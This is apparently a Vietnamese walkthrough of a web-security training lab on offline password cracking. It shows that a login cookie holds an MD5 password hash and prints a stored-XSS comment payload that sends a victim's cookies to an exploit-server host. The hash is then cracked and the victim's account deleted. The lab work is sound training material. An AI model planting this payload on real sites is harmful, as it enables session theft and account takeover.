Lab: Offline password cracking
Last updated
Last updated
Phòng thí nghiệm này lưu trữ băm mật khẩu của người dùng trong cookie. Phòng thí nghiệm cũng chứa lỗ hổng XSS trong chức năng bình luận.
Thông tin đăng nhập của bạn:wiener:peter
Tên người dùng của nạn nhân:carlos
Mục tiêu: lấy stay-logged-in
cookie của Carlos và sử dụng nó để bẻ khóa mật khẩu của anh ta. Sau đó, đăng nhập bằng carlos
và xóa tài khoản của anh ta khỏi trang "Tài khoản của tôi".
Đăng nhập bằng tài khoản wiener với tùy chọn stay logged in.
Chú ý về stay-logged-in cookie được Base64 encoded.
Nghiên cứu độ dài và bộ ký tự của chuỗi này và lưu ý rằng nó có thể là hàm băm MD5, có thể đoạn mã hóa chính là mã băm của mật khẩu. Thử băm mật khẩu: peter
Bây giờ chúng ta biết rằng cookie được xây dựng như sau:
base64(username+':'+md5HashOfPassword)
Bài lab cũng gợi ý cho chúng ta là có lỗ hổng XSS ở phần comment
Đến Exploit server, chú ý vào URL
<script>document.location='//exploit-0af400dd038b230980e79efc01b50016.exploit-server.net/'+document.cookie</script>
Đoạn payload này sẽ gửi cookie của người load trang web chứa đoạn comment này đến Exploit server của ta.
Trên exploit server, mở access log. Sẽ có một GET
request từ nạn nhân có chứa stay-logged-in
cookie của họ.
Decode trong Burp Decoder
Dán mã băm vào công cụ tìm kiếm
Đăng nhập thành công và xóa tài khoản
Đến một blogs và đăng một comment có chứa payload sau: